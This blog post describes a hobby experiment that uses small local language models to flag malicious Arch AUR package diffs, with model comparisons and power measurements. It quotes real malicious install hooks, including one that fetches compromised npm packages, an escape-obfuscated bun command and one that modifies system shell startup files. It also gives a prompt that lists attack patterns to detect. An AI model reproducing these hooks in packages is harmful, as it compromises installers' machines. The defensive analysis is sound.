AUR malware detection with small local model

The Archlinux AUR (Arch User Repository) recently had issues with an influx of malicious PKGBUILDs (incident report). Those are unofficial package descriptions, and users are supposed to review PKGBUILD themselves before installing them, but that obviously doesn’t always happen¹. As a weekend experiment, I wanted to see how LLMs would fare at auto-detecting malicious content, without playing the token-maxing game.

A short disclaimer: Not an expert at this, just a weekend experiment that I thought would be interesting to some. Text: human-generated. Code: not.

Attack patterns

The first wave of attack consisted in diffs that look like this, installing npm, then a compromised atomic-lockfile package:

diff --git a/PKGBUILD b/PKGBUILD
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -8,6 +8,7 @@
+  'npm'
@@ -19,6 +20,7 @@
+install=xxx-bin-deps.install
diff --git a/xxx-bin-deps.install b/xxx-bin-deps.install
--- /dev/null
+++ b/xxx-bin-deps.install
@@ -0,0 +1,4 @@
+post_install() {
+  cd /tmp
+  npm install atomic-lockfile glob ansi-colors
+}

A second wave did something similar with bun instead of npm.

Vibe-coded scanner

My first thought was to see how much of my Claude credits it would cost to scan every package description change on the AUR. Unlike other more elaborate setups, I only focus on the package description itself (PKGBUILD, additional patches, scripts…). If the source itself is harmful, it’s a different, wider ecosystem problem.

I just put Claude in auto-mode to try to solve the problem. AUR provides some API surface, so the script simply fetches an updated AUR metadata database (if available), and then fetches all the diffs for updated package descriptions.

Then, the following instructions are fed to the model, followed by each individual diff:

You are a supply-chain security analyst reviewing the git diff of one Arch Linux
AUR package for malware. Judge ONLY the code in the diff — what it would *do* if
built or installed. The package's name, age, vote count, or popularity is NOT
evidence of anything; ignore it. For a brand-new package the diff is the initial
commit (the full PKGBUILD/scripts as `+` additions); otherwise it is just the
change. Focus on added lines (`+`).

Flag a diff only for concrete malicious behaviour:
- remote fetch-and-execute (`curl|bash`, `bash <(curl)`, `python -c` fetching,
  `base64 -d | sh`, `eval` of downloaded data)
- hardcoded IP:port / C2; sources from paste sites, raw gists, IP URLs,
  file-drop hosts, URL shorteners, ngrok
- write + `chmod +x` + exec in `/tmp`; systemd unit / cron / timer pointing at
  dropped files; `sudo`
- obfuscation (long base64/hex, `\\x` escapes)
- a binary for a well-known app sourced from a non-official domain
  (typosquat / masquerade)
- installing/running unrelated packages (e.g. `npm install`/`npx`) in build()
  or an install hook

Most diffs are ordinary packaging and are `clean`. Do NOT downgrade a clean diff
to `review` just because the package is new, unpopular, or sparsely documented —
that is not a security signal. Legitimate `-bin` packages pulling from the
vendor's official release URL are clean.

Verdict scale (pick the lowest that fits):
- clean      : nothing concerning in the diff. This is the common case.
- review     : a specific line is genuinely ambiguous and a human should look —
               not "could be anything", but "this exact thing might be bad".
- suspicious : a concrete pattern above is present and not clearly legitimate.
- malicious  : clear fetch-and-execute, C2, or obfuscated payload.

Respond with ONLY a JSON object (no prose, no markdown fences). For a clean
diff, leave iocs/reasons/evidence empty:
{
  "verdict": "clean | review | suspicious | malicious",
  "confidence": 0.0,
  "iocs": ["130.162.225.47:8080", "https://..."],
  "reasons": ["one-line findings tied to a specific line"],
  "evidence": [{"snippet": "exact line", "why": "what's wrong"}]
}

I had almost no input on that prompt (vibe-prompting?), I think it’s quite reasonable, but maybe overfitted to actual attacks on hand here (one of the future attacks used exactly one of the patterns mentioned in the prompt though)…

I don’t think the code itself is of major value, I can post it if people are interested but it’s just a prompt away from being regenerated: you could just feed this post to a good model.

Claude Haiku was definitely able to detect the existing malicious packages, with no false positive².

Model choice

There are about 1000-2000 pushes to the AUR every day, and it quickly became obvious the costs of something like Claude Haiku would be too high: somebody mentioned 0.03$ per package, so 30-60$/day, or ~1000-2000$/month, reasonable with a token-maxing mindset, absolutely not as a hobby project, or for a non-profit like Arch.

So I decided to try local models. I only have a ~3 year old laptop with a beefy CPU (Intel Raptor Lake, 6 Performance-cores, 8 Efficient-cores), and a ton of RAM (64GB), but a totally useless integrated GPU³. A bit of prompting later, I ended up trying the Google Gemma 4 models, that are supposed to be able to run well on CPU.

I first tried the biggest I could run: Gemma 4 26B A4B (mixture of experts, 4B active parameters), and it was definitely able to catch the malicious samples I collected.

I then sent Claude on a mission to test different models (all 4-bit quantized GGUFs running with llama.cpp):

Model	Size	Malware caught	Total time
Gemma 4 26B	14 GB	7/7	(similar to E4B)
Gemma 4 E4B	5 GB	7/7	389s
Gemma 4 E2B	3.2 GB	7/7	110s ⚡
Qwen3.5-4B	2.7 GB	❌ 4/7	476s

E4B is less RAM-intensive, but about the same speed as 26B A4B from my recollection – seems like that’s what the mixture of experts thing is good at: the number of active parameters stays small (“A4B”). Qwen3.5-4B did not perform well. E2B was a very good surprise though: ~3.5x faster than E4B/26B A4B, while using much less RAM.

Suddenly we have a system that can detect malware with a few decent CPU cores and 4GB of RAM, in about 20s per package. More than fast enough to scan every single change if running 24/7.

New detections

It’s unclear how well the small model would perform with serious attacks, but it was able to detect 2 more waves after I set it up:

Slightly obfuscated content (or as somebody mentioned in a phoronix comment, That doesn’t obfuscate anything, it just screams “look at me, I’m doing something nefarious”):

diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
--- /dev/null
+++ b/htbrowser-bin-deps.install
@@ -0,0 +1,3 @@
+post_install() {
+  $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
+}

And insults in what looks like Russian (technically harmless, still malicious though):

diff --git a/PKGBUILD b/PKGBUILD
index e1d51c2d80d0..55a192de8f60 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -20,6 +20,13 @@ build() {
+post_install() {
+  echo 'echo '[insert insults]'' >> /etc/bash.bashrc
+  echo 'echo '[insert insults]'' >> /etc/zsh/zshrc
+  echo 'echo '[insert insults]'' >> /etc/fish/config.fish
+  echo 'echo '[insert insults]'' >> /etc/profile.d/albanianvirus2.sh
+}
+

It also picked up 2 smaller issues with other package descriptions, that are packaging mistakes rather than actual malicious behaviour:

One author kept pushing empty git commits, which caused the model to hallucinate a serious attack. Clearly a false positive, I fixed the script, and also notified the author (pushing empty commits isn’t very useful).

A malformed package obtaining version from a git tag:

+pkgver=VERSION # This will be automatically updated by makepkg via pkgver()

I think there were a few more false positives, and a few model crashes/errors that could be fixed by fine-tuning the script with more data, but the false positive rate has been very low.

P-cores vs E-cores (and GPU)

And just another fun one to conclude, running this on my laptop makes it really hot. Claude did some experiments and noticed that pinning to the E cores is better for peak power consumption (but similar total energy – captured using RAPL).

Mask	Time/classify	Avg power	Energy/classify
`0,2,4,6,8,10` — 6 P-cores	3.98s	31.6 W	125.6 J
`12-19` — all 8 E-cores	8.88s	13.0 W	115.2 J
GPU (Iris Xe, SYCL)	13.9s	14.9 W	206 J

While at it, I also wanted to double-check how the GPU fares. It took a while to install the SYCL llama.cpp (from AUR), and, performance/power is not worth it.

Running this kind of quick-and-dirty performance experiment has become extremely easy nowadays (one prompt vs hours of trying to figure out how to use RAPL properly).

Future?

Probably not much, I may try to keep running this script for a while to see if I pick up more bad packages.

The code would probably need to be rewritten to run seriously in production, and a lot of other people seem to be interested in that space, but I thought this experiment provides insights into what is possible with a small local model.

Those attacks focused on abandoned package descriptions. It makes me hope that the real-world impact is minimal (abandoned packages shouldn’t be the most popular ones, hopefully). I also believe there are systematic issues about the AUR system itself that need to be fixed, it looks like the Arch team are on it. ↩
False negatives are always trickier to measure of course… Nothing guarantees I didn’t miss another malware class in the flood. ↩
Useless for running LLMs, good enough to play Factorio, what more do you need in life. ↩